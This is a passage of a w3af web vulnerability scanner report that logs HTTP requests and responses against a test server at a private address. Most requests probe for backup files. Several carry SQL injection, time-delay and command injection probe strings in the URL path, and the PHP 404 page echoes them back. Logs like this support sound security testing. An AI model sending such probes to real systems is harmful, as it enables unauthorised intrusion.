                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="452">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="454">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.jar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.jar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="455">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.bak1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.bak1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="456">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="457">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="459">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.bak HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.bak&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="461">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.back HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.back&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="462">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.class HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.class&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="463">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.java HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.java&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="464">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="467">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.old1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.old1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="469">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.backup HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.backup&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="470">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.old HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.old&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="471">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.backup1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.backup1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="472">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.$$$ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.$$$&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="474">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/34%27+OR+%2734%27%3D%2734 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 34%27+OR+%2734%27%3D%2734 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='34%27+OR+%2734%27%3D%2734'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="491">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/34%27+AND+%2734%27%3D%2735 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 34%27+AND+%2734%27%3D%2735 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='34%27+AND+%2734%27%3D%2735'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="505">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/96+OR+96%3D96+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 96+OR+96%3D96+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='96+OR+96%3D96+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="513">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/Thread.sleep%283000%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Thread.sleep%283000%29%3B&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="515">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %2Fusr%2Fsbin%2Fping+-s+localhost+4 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%2Fusr%2Fsbin%2Fping+-s+localhost+4'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="518">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/96+AND+96%3D97+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 96+AND+96%3D97+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='96+AND+96%3D97+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="527">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%22 HTTP/1.1</status>
